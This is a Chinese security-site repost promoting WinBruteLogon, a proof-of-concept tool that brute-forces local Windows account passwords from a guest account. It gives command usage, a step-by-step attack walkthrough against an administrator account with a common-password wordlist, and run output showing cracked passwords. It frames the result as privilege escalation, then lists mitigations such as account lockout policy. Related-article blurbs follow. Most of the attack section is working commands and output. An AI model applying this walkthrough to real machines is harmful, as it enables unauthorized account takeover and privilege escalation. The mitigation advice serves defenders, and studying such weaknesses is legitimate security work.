神兵利器 - 在没有任何权限的情况下破解任何 Microsoft Windows 用户密码

VSole2022-04-21 10:42:52

项目地址:https://github.com/DarkCoderSc/win-brute-logon

目标:Windows XP 到最新的 Windows 10 版本 (1909)

用法

词表文件

WinBruteLogon.exe -u <username> -w <wordlist_file>

标准输入词汇表

type <wordlist_file> | WinBruteLogon.exe -u <username> -

介绍

这个 PoC 更像是我所说的 Microsoft Windows 身份验证机制中的一个严重弱点,而不是一个漏洞。

最大的问题与缺乏执行此类操作所需的权限有关。

实际上,通过访客帐户(Microsoft Windows 上最受限制的帐户),您可以破解任何可用本地用户的密码。

使用命令找出哪些用户存在:net user

这个 PoC 使用多线程来加速进程并支持 32 位和 64 位。

PoC 测试场景(使用访客账户)

在 Windows 10 上测试

安装和配置新更新的 Windows 10 虚拟机或物理机。

在我的情况下,完整的 Windows 版本是:1909 (OS Build 18363.778)

以管理员身份登录并让我们创建两个不同的帐户:一个管理员和一个普通用户。两个用户都是本地用户。

/!\ 重要提示:我在演示中使用了 Guest 帐户,但这个 PoC 不仅限于 Guest 帐户,它适用于任何帐户/组(guest 用户/普通用户/admin 用户等...)

创建一个新的管理员用户

net user darkcodersc /addnet user darkcodersc trousersnet localgroup administrators darkcodersc /add

创建普通用户

net user HackMe /addnet user HackMe ozlq6qwm

创建一个新的访客帐户

net user GuestUser /addnet localgroup users GuestUser /deletenet localgroup guests GuestUser /add

开始攻击

从管理员帐户注销或重新启动计算机并登录到访客帐户。

将 PoC 可执行文件放在您作为访客用户可以访问的任何地方。

用法 :WinBruteLogon.exe -v -u -w

-v是可选的,它设计了详细模式。

默认情况下,域名是%USERDOMAIN%env var 指定的值。您可以使用选项指定自定义名称-d

破解第一个用户:(darkcodersc管理员)

提示(客人)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt

等待几秒钟以查看以下结果:

[ .. ] Load 10k-most-common.txt file in memory...[DONE] 10002 passwords successfully loaded.[INFO] 2 cores are available[ .. ] Create 2 threads...[INFO] New "TWorker" Thread created with id=2260, handle=364[INFO] New "TWorker" Thread created with id=3712, handle=532[DONE] Done.[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers][ .. ] Finalize and close worker threads...[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.[DONE] Done.[INFO] Ellapsed Time : 00:00:06

破解第二个用户:(HackMe普通用户)

提示(客人)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt

等待几秒钟以查看以下结果:

[ .. ] Load 10k-most-common.txt file in memory...[DONE] 10002 passwords successfully loaded.[INFO] 2 cores are available[ .. ] Create 2 threads...[INFO] New "TWorker" Thread created with id=5748, handle=336[INFO] New "TWorker" Thread created with id=4948, handle=140[DONE] Done.[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm][ .. ] Finalize and close worker threads...[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.[DONE] Done.[INFO] Ellapsed Time : 00:00:06

如果您获得了对低权限用户的访问权限,则可以破解更高权限用户的密码并提升您的权限。

修复:

  • 禁用来宾帐户(如果存在)。
  • 应用程序白名单。
  • 按照指南创建并保持密码强度高。将此应用于所有用户。

实施安全锁定策略(默认不存在)

打开secpol.msc然后转到Account Policies>并使用(1 到 999)之间的所需值Account Lockout Policy编辑值。Account lockout threshold

值表示锁定之前可能尝试的次数。

/!\ LockDown Policy 不适用于管理员帐户。此时,对管理员帐户(如果启用)的最佳保护是设置一个非常复杂的密码。

info
本作品采用《CC 协议》,转载必须注明作者和本文链接
我们针对容器化微服务的层结构特征,设计了基础层共享的部署算法,降低微服务下载通信量并增加微服务部署密度,提升边缘吞吐量。
WithSecure Intelligence 表示,Ducktail 恶意软件试图劫持使用 Facebook 商业和广告平台的个人的账户。
介绍一个好用的web信息收集工具 其功能包括: 子域名收集 多线程子域名爆破 指纹信息收集 备案信息收集 批量子域名收集和批量子域名爆破 是一款挖掘SRC的实用小工具
攻击者正在使用技术来更改URL,并将受害者发送到流氓和潜在的恶意域。这可以包括百分比编码,并且URL可以指向其他地方。网络钓鱼中的一些常见策略包括:伪造的文件附件实际上是一个包含URL的图像,以及您认为您将要访问一个站点的开放重定向URL攻击,“这可能是一系列重定向链,非常可怕。”如果确实需要打开URL,Malik建议在安全的虚拟机中打开URL,或将其交给法医专家,后者将拥有合适的设备和工具。
互联网基础设施是上层网络应用蓬勃发展的重要基石。近年来,随着地缘冲突的加剧,互联网的互联互通特性正面临着前所未有的严峻挑战,互联网基础设施的安全性成为备受关注的话题。
7月27日上午,网络安全研究国际学术论坛(InForSec)将于北京网络安全大会(BCS)“学术日”举办题为“软件供应链安全”的学术交流会。 会议由清华大学(网络研究院)-奇安信联合研究中心研究员应凌云主持,会上将有来自复旦大学、清华大学(网络研究院)-奇安信联合研究中心、浙江大学、蚂蚁集团、香港中文大学的学者们分享研究过程中的灵感、经验和体会。
0x02.访问80端口:一个很经典的WordPress页面当然最重要的信息是only?这里有两种可能:1.指wordpress后台账户只有oscp,2.是这台靶机系统上只有ROOT和OSCP这两个用户。
工具介绍为了方便安全从业人员在使用网络测绘平台进行信息搜集时的效率,本程序集合了多个网络测绘平台,可以快速在多个网络测绘平台搜索信息并且合并展示及导出。?
在SQL注入中它的作用是什么,那么有没有可以替代这个库的方法呢。
Facebook 的商业和广告账户正处于正在进行的名为Ducktail的活动的接收端,该活动旨在作为财务驱动的网络犯罪活动的一部分夺取控制权。 芬兰网络安全公司 WithSecure(前身为 F-Secure Business)在一份新报告中表示: “威胁行为者的目标是可能使用信息窃取恶意软件访问 Facebook Business 帐户的个人和员工。”
VSole
网络安全专家